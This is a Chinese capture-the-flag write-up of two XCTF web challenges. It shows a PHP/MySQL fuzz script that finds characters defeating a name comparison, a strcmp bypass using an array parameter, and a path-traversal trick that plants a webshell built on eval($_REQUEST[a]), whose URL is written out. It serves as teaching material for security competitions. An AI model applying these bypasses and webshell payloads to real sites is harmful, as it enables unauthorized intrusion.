XCTF两道web题目的writeup

只会web正好又是php的审计题目,于是就把两道题都做了。大牛们都忙着破各种路由器,破各种设备去了,我也侥幸得了个第一:

QQ图片20141024184200.png

第一题,没怎么截图,查看代码如下:

QQ图片20141025151017.jpg

主要是考mysql的一个trick。就是查询出来的$row['id']和$id的区别。这么说可能有点不明白,我们用一下代码fuzz一下mysql:

<?php
mysql_connect("localhost","root","root");
mysql_select_db ("test");
mysql_query("set names utf8");
for($i = 0 ; $i < 256 ; $i++){
    $c = chr($i);
    $name = mysql_real_escape_string('hehe' . $c);
    $sql = "SELECT * FROM `name` WHERE `name` = '{$name}'";
    $row = mysql_fetch_array(mysql_query($sql));
    if ($row['name'] == 'hehe') {
        echo "{$c} <br/>";
    }
}

如果在name后面加上一个字符,在mysql里查询,如果查到的和不加这个字符查出来的行相同,则输出。

得到了如下结果:

001.jpg

我们随便挑一个跟在adog后面提交就能得到flag了。如下:

002.jpg

003.jpg

第二题,访问pwnme.php得到如下提示:

XCTF22.png

很快就明白了是要说明在php里=====的意义不同。我记得之前一个php的trick,我猜这里的代码是这样:strcmp($_POST[password], 'xxxx')==0。看一下php的strcmp文档就能知道:

XCTF142.png

所以传一个password[]=xxx即可得到如下页面:

XCTF175.png

访问可得到一段源码,yeah碰上我最爱的审计题了:

XCTF205.png

源码其实很简单,就是写入一个webshell,但文件名是跟当前秒数有关,所以大部分人想到要跑一下文件名。
当然,我这个人比较懒,能不能想个方法,不要跑这该死的文件名。

这道题没有过滤/和../,我可以直接做跳转,将时间作为目录名,再用../跳转到上个目录,这样我的文件就不带时间前缀了。
当然还要让php不出错,试了几次,数据包如下即可:

XCTF378.png

这样我的shell就为:http://106.120.92.162:5000/backup/".eval($_REQUEST[a]).php

XCTF453.png

不需要跑用户名。拿到shell了就读flag即可。

免责声明:文章内容不代表本站立场,本站不对其内容的真实性、完整性、准确性给予任何担保、暗示和承诺,仅供读者参考,文章版权归原作者所有。如本文内容影响到您的合法权益(内容、图片等),请及时联系本站,我们会及时删除处理。查看原文

为您推荐